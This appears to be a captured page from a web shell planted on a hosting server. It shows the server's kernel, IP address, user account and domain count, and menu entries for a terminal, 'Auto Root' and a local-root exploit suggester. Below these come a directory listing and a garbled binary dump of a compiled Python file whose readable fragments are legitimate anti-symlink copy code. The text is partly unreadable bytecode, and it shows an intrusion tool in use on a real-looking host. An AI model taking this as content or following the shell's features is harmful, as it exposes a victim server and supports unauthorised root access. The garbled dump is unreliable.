Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
lvemanager /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
copy_directory.cpython-311.opt-1.pyc
10.78
KB
-rwxr-xr-x
2026-08-11 11:38
copy_directory.cpython-311.pyc
10.78
KB
-rwxr-xr-x
2026-08-11 11:38
crontab.cpython-311.opt-1.pyc
9.27
KB
-rwxr-xr-x
2026-08-11 11:38
crontab.cpython-311.pyc
9.27
KB
-rwxr-xr-x
2026-08-11 11:38
exec_command.cpython-311.opt-1.pyc
4.94
KB
-rwxr-xr-x
2026-08-11 11:38
exec_command.cpython-311.pyc
4.94
KB
-rwxr-xr-x
2026-08-11 11:38
Save
Rename
� �C%bI��� �x � d dl mZ d dl mZ d dl mZ d dlZd dlZd dlZd dlZd dlZd� Z d� Z G d� d� � ZdS ) � )�print_function)�division)�absolute_importNc � � t j t j z t j z t j z }t j | |d� � }t j |d� � S )a# Open *path* for writing, refusing to follow a final-component symlink. Returned object is a binary file handle the caller is responsible for closing. Used so a planted symlink at the destination cannot redirect the root-context copy into /etc/cron.d, /usr/lib/systemd, etc. i� �wb)�os�O_WRONLY�O_CREAT�O_TRUNC� O_NOFOLLOW�open�fdopen)�path�flags�fds �copy_directory.py�_safe_open_nofollow_for_writer sE � � �K�"�*�$�r�z�1�B�M�A�E� ���u�e� $� $�B� �9�R����� c �@ � t j � | |� � }n# t $ r d}Y nw xY w|rdS t | d� � 5 }t |� � 5 }t j ||� � ddd� � n# 1 swxY w Y ddd� � dS # 1 swxY w Y dS )u shutil.copyfile replacement that refuses to follow a destination symlink. Also refuses to copy a file onto itself: the destination open uses O_TRUNC, so if source and destination resolve to the same inode the source is zeroed before ``copyfileobj`` reads a single byte. The upstream ``shutil.copyfile`` raises ``SameFileError`` for this case; the NOFOLLOW writer must too — otherwise CopyDirectory silently truncates every file when its source and destination roots resolve to the same directory (CLOS-6789). FN�rb)r r �samefile�OSErrorr r �shutil�copyfileobj)�source�destination�same�fsrc�fdsts r �_safe_copyfile_nofollowr s5 � ���w�����4�4����� � � ���������� ��� �f�d� � � +�t� *�;� 7� 7� +�4���t�T�*�*�*� +� +� +� +� +� +� +� +� +� +� +���� +� +� +� +�+� +� +� +� +� +� +� +� +� +� +� +���� +� +� +� +� +� +sB � # �2�2� B�A;�/B�;A? �?B�A? �B�B�Bc �J � e Zd Z dd�Zd� Zd� Zd� Zd � Zd � Zd� Z d� Z d � ZdS )� CopyDirectory�*r NFc � � || _ || _ || _ || _ || _ g | _ g | _ |�|nt | _ || _ || _ dS )ze ATTENTION: values other than '*' for parameter 'directorypattern' are not supported N)�sourcedirectory�destinationdirectory�pattern�directorypattern�overwriteolder� directorylist�filelistr �copyfile�copy_file_mode�rewrite_plugin_conf) �selfr r r'